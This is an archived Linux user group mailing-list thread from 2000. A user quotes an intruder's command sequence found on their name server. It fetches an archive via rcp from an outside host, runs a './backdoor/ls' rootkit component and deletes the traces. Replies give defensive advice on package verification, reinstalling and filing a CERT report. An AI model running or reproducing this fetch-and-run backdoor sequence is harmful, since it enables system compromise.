[lug] What does this mean?

Cory Dekker cory at sysmgrs.com
Tue Mar 21 00:10:31 MST 2000


You should also probably file a CERT incident, especially with respect
to linux7.europop.de, so that it is either recognized as a hacker box (not
likely) or the System Admin can be notified that their box has probably
been comprimised (highly likely).

                                                -Cory


Tkil wrote:

> >>>>> "Shannon" == nunar  <nunar at mauromedia.net> writes:
>
> [reformatted for sanity]
>
> Shannon> I was going through my name server and somebody had entered this:
> Shannon> #   cd /tmp; \
> Shannon>        rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
> Shannon>        echo "* downloaded "; \
> Shannon>        tar xfz ak*; \
> Shannon>        cd ak; \
> Shannon>        ./backdoor/ls; \
> Shannon>        cd ..; \
> Shannon>        rm -rf ak*; \
> Shannon>        exit
>
> note that the only line which actually looks dangerous is the
> "./backdoor/ls" one; everything else should be pretty polite.
> (although, if they already have root... ouch.)
>
> Shannon> Does anybody know what this is doing to my system?
>
> short version: someone tried to run a rootkit against your box.  i
> can't tell offhand whether or not they succeeded, but you should
> probably "rm -rf /tmp/backup" at the very least.
>
> jafo says:  if you are running redhat, check the MD5 sums of all the
> packages on the box (this is an option to 'rpm'; consult the man page,
> but"--verify" should be close...)
>
> jafo also says:  consult the most excellent linux security howto.  (hi
> kev!)  accessable at:
>
>    http://www.tummy.com/security-howto/
>
> prepare to do a backup of important data (e.g. your named config
> files) and possibly do a full reinstall.  be absolutely sure you are
> running the latest versions of named and friends (BIND-*).  also,
> don't do a blind copy of the named config files; double-check that
> nobody is using your server who shouldn't be.
>
> t.
>
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug





More information about the LUG mailing list